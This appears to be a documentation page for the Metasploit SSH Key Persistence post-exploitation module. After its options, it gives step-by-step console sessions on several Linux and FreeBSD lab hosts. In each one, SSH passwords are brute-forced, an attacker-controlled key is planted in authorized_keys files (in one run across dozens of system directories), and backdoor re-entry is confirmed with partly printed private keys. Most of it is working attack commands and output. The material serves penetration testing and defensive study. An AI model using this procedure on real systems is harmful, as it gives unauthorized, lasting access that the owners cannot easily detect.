SSH Key Persistence - Metasploit
This page contains detailed information about how to use the post/linux/manage/sshkey_persistence metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: SSH Key Persistence
Module: post/linux/manage/sshkey_persistence
Source code: modules/post/linux/manage/sshkey_persistence.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will add an SSH key to a specified user (or all), to allow remote login via SSH at any time.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/linux/manage/sshkey_persistence
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > show options
... show and set options ...
msf post(sshkey_persistence) > set SESSION session-id
msf post(sshkey_persistence) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/linux/manage/sshkey_persistence")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
This module will add an SSH key to a specified user (or all), to allow remote login on the victim via SSH at any time.
Creating A Testing Environment
This module has been tested against:
- Kali Rolling
- Ubuntu 16.04
- Centos 6
- Fedora 20
- FreeBSD 9
Verification Steps
- Start msfconsole
- Exploit a box via whatever method
- Do:
use post/linux/manage/sshkey_persistence
- Do:
set session #
- Optional Do:
set username
- Do:
set verbose true
- Optional Do:
Set sshd_config
- Do:
exploit
Options
SSHD_CONFIG
Location of the sshd_config file on the remote system. We use this to determine if the authorized_keys file location has changed on the system. If it hasn't, we default to .ssh/authorized_keys
USERNAME
If set, we only write our key to this user. If not, we'll write to all users
PUBKEY
A public key to use. If not provided, a pub/priv key pair is generated automatically
Scenarios
Ubuntu 16.04 (user level)
Get initial access
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'tiki:tiki' 'uid=1000(tiki) gid=1000(tiki) groups=1000(tiki),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare) Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:38886 -> 192.168.2.190:22) at 2016-06-19 09:52:48 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Use the post module to write the ssh key
msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set user tiki
user => tiki
msf post(sshkey_persistence) > set CreateSSHFolder true
CreateSSHFolder => true
msf post(sshkey_persistence) > exploit
[*] Checking SSH Permissions
[+] Pubkey set to yes
[*] Authorized Keys File: .ssh/authorized_keys
[*] Added User SSH Path: /home/tiki/.ssh
[*] Attempting to create ssh folders that don't exist
[+] Storing new private key as /root/.msf4/loot/20160619095250_default_192.168.2.190_id_rsa_425588.txt
[*] Adding key to /home/tiki/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 761 bytes in 1 chunks of 2886 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Post module execution completed
Verify our access works
msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.190
rhosts => 192.168.2.190
msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
key_path => /root/.msf4/loot/
msf auxiliary(ssh_login_pubkey) > set username tiki
username => tiki
msf auxiliary(ssh_login_pubkey) > run
[*] 192.168.2.190:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 2 keys from /root/.msf4/loot
[+] SSH - Success: 'tiki:-----BEGIN RSA PRIVATE KEY-----
...snip...
7m+il2AWyuPWOWEnpXRur3knruE2k97ObMH92FeI8SYaIThvqNUL
-----END RSA PRIVATE KEY-----
' 'uid=1000(tiki) gid=1000(tiki) groups=1000(tiki),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare) Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 2 opened (192.168.2.229:42580 -> 192.168.2.190:22) at 2016-06-19 09:56:22 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
If you try to run for a user you don't have permissions for
msf post(sshkey_persistence) > exploit
[*] Checking SSH Permissions
[+] Pubkey set to yes
[*] Authorized Keys File: .ssh/authorized_keys
[*] Added: /root/.ssh
[*] Attempting to create ssh folders that don't exist
[+] /root/.ssh
[*] Creating /root/.ssh folder
[-] No users found with a .ssh directory
[*] Post module execution completed
CentOS 6 (user level)
ssh keys must be enabled in sshd_config.
Get Initial Access
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username user
username => user
msf auxiliary(ssh_login) > set password password
password => password
msf auxiliary(ssh_login) > set rhosts 192.168.4.62
rhosts => 192.168.4.62
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'user:password' 'uid=500(user) gid=500(user) groups=500(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:39289 -> 192.168.4.62:22) at 2016-06-19 15:27:27 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Use the post module to write the ssh key
msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set user user
user => user
msf post(sshkey_persistence) > exploit
[*] Checking SSH Permissions
[*] Authorized Keys File: .ssh/authorized_keys
[*] Added User SSH Path: /home/user/.ssh
[*] Attempting to create ssh folders that don't exist
[+] Storing new private key as /root/.msf4/loot/20160619152757_default_192.168.4.62_id_rsa_633695.txt
[*] Creating /home/user/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1447 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Post module execution completed
Verify our access works
msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.4.62
rhosts => 192.168.4.62
msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
key_path => /root/.msf4/loot/
msf auxiliary(ssh_login_pubkey) > set username user
username => user
msf auxiliary(ssh_login_pubkey) > run
[*] 192.168.4.62:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 6 keys from /root/.msf4/loot
[+] SSH - Success: 'user:-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA8xtiDZrE6XgkOJaatg+TvUcrEr92/GDSZUtEqO9RvvvPO1Yt
...snip...
Ubz5hiBypg1/C2TMB9jH3QLKmT66Te7rfym7rOBIgIJKivs5JLZe7w==
-----END RSA PRIVATE KEY-----
' 'uid=500(user) gid=500(user) groups=500(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 2 opened (192.168.2.229:34721 -> 192.168.4.62:22) at 2016-06-19 15:49:34 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
CentOS 6 (root)
The following sshd_config changes were made:
PubkeyAuthentication yes
AuthorizedKeysFile .sshsecret/.authorized_keys
PermitRootLogin yes
Get Initial Access
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set password pass
password => pass
msf auxiliary(ssh_login) > set rhosts 192.168.4.62
rhosts => 192.168.4.62
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'root:pass' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.localdomain 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:46420 -> 192.168.4.62:22) at 2016-06-19 15:58:32 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Use the post module to write the ssh key. Keep in mind NOT setting a user (targeted), and CreateSSHFolder will possibly make MANY folders/files as can be observed below.
msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set CreateSSHFolder true
CreateSSHFolder => true
msf post(sshkey_persistence) > exploit
[*] Checking SSH Permissions
[+] Pubkey set to yes
[*] Authorized Keys File: .sshsecret/.authorized_keys
[*] Finding .sshsecret directories
[*] Attempting to create ssh folders that don't exist
[*] Creating //.sshsecret folder
[*] Creating /bin/.sshsecret folder
[*] Creating /dev/.sshsecret folder
[*] Creating /etc/abrt/.sshsecret folder
[*] Creating /etc/ntp/.sshsecret folder
[*] Creating /proc/.sshsecret folder
[*] Creating /root/.sshsecret folder
[*] Creating /sbin/.sshsecret folder
[*] Creating /usr/games/.sshsecret folder
[*] Creating /var/adm/.sshsecret folder
[*] Creating /var/cache/rpcbind/.sshsecret folder
[*] Creating /var/empty/saslauth/.sshsecret folder
[*] Creating /var/empty/sshd/.sshsecret folder
[*] Creating /var/ftp/.sshsecret folder
[*] Creating /var/gopher/.sshsecret folder
[*] Creating /var/lib/avahi-autoipd/.sshsecret folder
[*] Creating /var/lib/gdm/.sshsecret folder
[*] Creating /var/lib/hsqldb/.sshsecret folder
[*] Creating /var/lib/mysql/.sshsecret folder
[*] Creating /var/lib/nfs/.sshsecret folder
[*] Creating /var/run/avahi-daemon/.sshsecret folder
[*] Creating /var/run/pulse/.sshsecret folder
[*] Creating /var/spool/lpd/.sshsecret folder
[*] Creating /var/spool/mail/.sshsecret folder
[*] Creating /var/spool/postfix/.sshsecret folder
[*] Creating /var/spool/uucp/.sshsecret folder
[*] Creating /var/www/.sshsecret folder
[+] Storing new private key as /root/.msf4/loot/20160619155920_default_192.168.4.62_id_rsa_271813.txt
[*] Creating //.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Creating /bin/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /dev/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /etc/abrt/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /etc/ntp/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Adding key to /home/user/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 761 bytes in 1 chunks of 2910 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /root/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /sbin/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /usr/games/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/adm/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/cache/rpcbind/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/empty/saslauth/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/empty/sshd/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/ftp/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/gopher/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/lib/avahi-autoipd/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/lib/gdm/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/lib/hsqldb/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/lib/mysql/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/lib/nfs/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/run/avahi-daemon/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/run/pulse/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/spool/lpd/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/spool/mail/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/spool/postfix/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/spool/uucp/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Creating /var/www/.sshsecret/.authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1458 bytes (octal-encoded), using printf
[+] Key Added
[*] Post module execution completed
FreeBSD9 (root)
Several sshd_config mods were needed to allow root login, and enable the service to run correctly.
Get Initial Access
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set password password
password => password
msf auxiliary(ssh_login) > set rhosts 192.168.2.130
rhosts => 192.168.2.130
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'root:password' 'uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) FreeBSD freebsd9 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64 '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:41724 -> 192.168.2.130:22) at 2016-06-19 22:10:59 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Use the post module to write the ssh key
msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set username root
username => root
msf post(sshkey_persistence) > exploit
[*] Checking SSH Permissions
[+] Pubkey set to yes
[*] Authorized Keys File: .ssh/authorized_keys
[*] Finding .ssh directories
[+] Storing new private key as /root/.msf4/loot/20160619221108_default_192.168.2.130_id_rsa_441694.txt
[*] Creating /root/.ssh/authorized_keys
[*] Max line length is 131073
[*] Writing 380 bytes in 1 chunks of 1461 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Post module execution completed
Verify our access works
msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.130
rhosts => 192.168.2.130
msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
key_path => /root/.msf4/loot/
msf auxiliary(ssh_login_pubkey) > set username root
username => root
msf auxiliary(ssh_login_pubkey) > run
[*] 192.168.2.130:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 4 keys from /root/.msf4/loot
[+] SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAqBC5XwkPOAtFn8zCFWIs3IIzUUfMvJPWxQQl1Porf8GiSs2B
...snip...
6aj815iPJp9X5vnIR6mRdTJP9UQraPe6jneicx8QfncfoqJbA2v7
-----END RSA PRIVATE KEY-----
' 'uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) FreeBSD freebsd9 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64 '
[*] Command shell session 2 opened (192.168.2.229:32991 -> 192.168.2.130:22) at 2016-06-19 22:14:16 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Fedora 20 (root)
Get Initial Access
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set password password
password => password
msf auxiliary(ssh_login) > set rhosts 192.168.2.143
rhosts => 192.168.2.143
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'root:password' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.homeGroup 3.11.10-301.fc20.x86_64 #1 SMP Thu Dec 5 14:01:17 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:35460 -> 192.168.2.143:22) at 2016-06-19 20:27:53 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Use the post module to write the ssh key
msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set user root
user => root
msf post(sshkey_persistence) > exploit
[*] Checking SSH Permissions
[*] Authorized Keys File: .ssh/authorized_keys
[*] Added User SSH Path: /root/.ssh
[+] Storing new private key as /root/.msf4/loot/20160619202835_default_192.168.2.143_id_rsa_458964.txt
[*] Creating /root/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1456 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Post module execution completed
Verify our access works
msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.143
rhosts => 192.168.2.143
msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
key_path => /root/.msf4/loot/
msf auxiliary(ssh_login_pubkey) > set username root
username => root
msf auxiliary(ssh_login_pubkey) > run
[*] 192.168.2.143:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 2 keys from /root/.msf4/loot
[!] No active DB -- Credential data will not be saved!
[+] SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAx5LLnAOPzc5KSI/Zd71bdHlexQrIpuASjUIGnJjlJVB9Sfyz
...snip...
vtOaL6/NsfxFDDrCBX72X5tv3rTA4MNzOFTYbCM80Ln6E2TDWgPv
-----END RSA PRIVATE KEY-----
' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.homeGroup 3.11.10-301.fc20.x86_64 #1 SMP Thu Dec 5 14:01:17 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 2 opened (192.168.2.229:35751 -> 192.168.2.143:22) at 2016-06-19 20:31:23 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Fedora 20 (user level)
Get Initial Access
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username user
username => user
msf auxiliary(ssh_login) > set password password
password => password
msf auxiliary(ssh_login) > set rhosts 192.168.2.143
rhosts => 192.168.2.143
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'user:password' 'uid=1000(user) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.homeGroup 3.11.10-301.fc20.x86_64 #1 SMP Thu Dec 5 14:01:17 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:37727 -> 192.168.2.143:22) at 2016-06-19 20:33:45 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Use the post module to write the ssh key
msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
session => 1
msf post(sshkey_persistence) > set verbose true
verbose => true
msf post(sshkey_persistence) > set username user
username => user
msf post(sshkey_persistence) > exploit
[*] Checking SSH Permissions
[*] Authorized Keys File: .ssh/authorized_keys
[*] Finding .ssh directories
[+] Storing new private key as /root/.msf4/loot/20160619203401_default_192.168.2.143_id_rsa_010117.txt
[*] Creating /home/user/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 380 bytes in 1 chunks of 1452 bytes (octal-encoded), using printf
[+] Key Added
[!] No active DB -- Credential data will not be saved!
[*] Post module execution completed
Go back to menu.
Msfconsole Usage
Here is how the linux/manage/sshkey_persistence post exploitation module looks in the msfconsole:
msf6 > use post/linux/manage/sshkey_persistence
msf6 post(linux/manage/sshkey_persistence) > show info
Name: SSH Key Persistence
Module: post/linux/manage/sshkey_persistence
Platform: Linux
Arch:
Rank: Excellent
Provided by:
h00die <[email protected]>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CREATESSHFOLDER false yes If no .ssh folder is found, create it for a user
PUBKEY no Public Key File to use. (Default: Create a new one)
SESSION yes The session to run this module on.
SSHD_CONFIG /etc/ssh/sshd_config yes sshd_config file
USERNAME no User to add SSH key to (Default: all users on box)
Description:
This module will add an SSH key to a specified user (or all), to
allow remote login via SSH at any time.
Module Options
This is a complete list of options available in the linux/manage/sshkey_persistence post exploitation module:
msf6 post(linux/manage/sshkey_persistence) > show options
Module options (post/linux/manage/sshkey_persistence):
Name Current Setting Required Description
---- --------------- -------- -----------
CREATESSHFOLDER false yes If no .ssh folder is found, create it for a user
PUBKEY no Public Key File to use. (Default: Create a new one)
SESSION yes The session to run this module on.
SSHD_CONFIG /etc/ssh/sshd_config yes sshd_config file
USERNAME no User to add SSH key to (Default: all users on box)
Advanced Options
Here is a complete list of advanced options supported by the linux/manage/sshkey_persistence post exploitation module:
msf6 post(linux/manage/sshkey_persistence) > show advanced
Module advanced options (post/linux/manage/sshkey_persistence):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the linux/manage/sshkey_persistence module can do:
msf6 post(linux/manage/sshkey_persistence) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the linux/manage/sshkey_persistence post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(linux/manage/sshkey_persistence) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Pubkey Authentication disabled
Here is a relevant code snippet related to the "Pubkey Authentication disabled" error message:
48: end
49: print_status('Checking SSH Permissions')
50: sshd_config = read_file(datastore['SSHD_CONFIG'])
51: /^PubkeyAuthentication[\s]+(?<pub_key>yes|no)/ =~ sshd_config
52: if pub_key && pub_key == 'no'
53: print_error('Pubkey Authentication disabled')
54: elsif pub_key
55: vprint_good("Pubkey set to #{pub_key}")
56: end
57: /^AuthorizedKeysFile[\s]+(?<auth_key_file>[\w%\/\.]+)/ =~ sshd_config
58: if auth_key_file
No users found with a <AUTH_KEY_FOLDER> directory
Here is a relevant code snippet related to the "No users found with a <AUTH_KEY_FOLDER> directory" error message:
90: end
91: end
92:
93: paths = paths.select { |d| directory?(d) }
94: if paths.nil? || paths.empty?
95: print_error("No users found with a #{auth_key_folder} directory")
96: return
97: end
98: write_key(paths, auth_key_file, sep)
99: end
100:
Go back to menu.
Related Pull Requests
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #12354 Merged Pull Request: Remove targets from aux and post modules
- #6995 Merged Pull Request: sshkey persistence
Go back to menu.
See Also
Check also the following modules related to this module:
- post/linux/manage/dns_spoofing
- post/linux/manage/download_exec
- post/linux/manage/geutebruck_post_exp
- post/linux/manage/iptables_removal
- post/linux/manage/pseudo_shell
Authors
- h00die <[email protected]>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.